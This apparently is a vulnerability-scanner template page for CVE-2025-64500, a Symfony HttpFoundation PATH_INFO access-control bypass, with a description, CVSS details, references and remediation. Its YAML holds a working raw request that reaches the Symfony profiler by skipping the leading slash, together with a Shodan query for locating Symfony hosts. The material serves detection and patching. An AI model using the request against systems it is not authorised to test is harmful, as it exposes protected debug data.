Symfony HttpFoundation - Access Control Bypass via PATH_INFO
CVE-2025-64500
Verified
Description
Symfony HttpFoundation component >= 2.0.0 and prior to versions 5.4.50, 6.4.29, and 7.3.7 contains an access control bypass vulnerability. The Request class improperly interprets some PATH_INFO values, producing URL paths without a leading `/`. This allows bypassing access control rules that are built with the `/-prefix` assumption.
Severity
High
CVSS Score
7.3
Exploit Probability
1%
Affected Product
symfony
Published Date
April 2, 2026
Template Author
dhiyaneshdk
CVE-2025-64500.yaml
id: CVE-2025-64500
info:
name: Symfony HttpFoundation - Access Control Bypass via PATH_INFO
author: DhiyaneshDk
severity: high
description: |
Symfony HttpFoundation component >= 2.0.0 and prior to versions 5.4.50, 6.4.29, and 7.3.7 contains an access control bypass vulnerability. The Request class improperly interprets some PATH_INFO values, producing URL paths without a leading `/`. This allows bypassing access control rules that are built with the `/-prefix` assumption.
impact: |
Attackers can bypass access control rules, potentially gaining unauthorized access to restricted resources.
remediation: Update to Symfony versions 5.4.50, 6.4.29, or 7.3.7 or later.
reference:
- https://github.com/symfony/symfony/security/advisories/GHSA-3rg7-wf37-54rm
- https://symfony.com/blog/cve-2025-64500-incorrect-parsing-of-path-info-can-lead-to-limited-authorization-bypass
- https://github.com/symfony/symfony/commit/9962b91b12bb791322fa73836b350836b6db7cac
- https://nvd.nist.gov/vuln/detail/CVE-2025-64500
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
cvss-score: 7.3
cve-id: CVE-2025-64500
cwe-id: CWE-647
epss-score: 0.01325
epss-percentile: 0.6834
metadata:
verified: true
max-request: 2
vendor: sensiolabs
product: symfony
shodan-query: cpe:"cpe:2.3:a:sensiolabs:symfony"
tags: cve,cve2025,symfony,auth-bypass
http:
- raw:
- |
GET /{{front_controller}}_profiler/ HTTP/1.1
Host: {{Hostname}}
payloads:
front_controller:
- "index.php"
- "app.php"
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "Symfony Profiler"
- "<title>Profiler</title>"
- "Symfony-Debug-Toolbar"
condition: or
# digest: 4a0a0047304502200ebe6da9fef1145d47645515e3fb027ece49a91f11bad0234d30fc7d6034a38f022100b77712f6689a46789e2f589076780d1471f4ef384c05c4f8b690d1e0dffb28b8:922c64590222798bb761d5b6d8e729507.3Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CVE ID:
cve-2025-64500
CWE ID:
cwe-647
References
https://github.com/symfony/symfony/security/advisories/GHSA-3rg7-wf37-54rmhttps://symfony.com/blog/cve-2025-64500-incorrect-parsing-of-path-info-can-lead-to-limited-authorization-bypasshttps://github.com/symfony/symfony/commit/9962b91b12bb791322fa73836b350836b6db7cachttps://nvd.nist.gov/vuln/detail/CVE-2025-64500
Remediation Steps
Update to Symfony versions 5.4.50, 6.4.29, or 7.3.7 or later.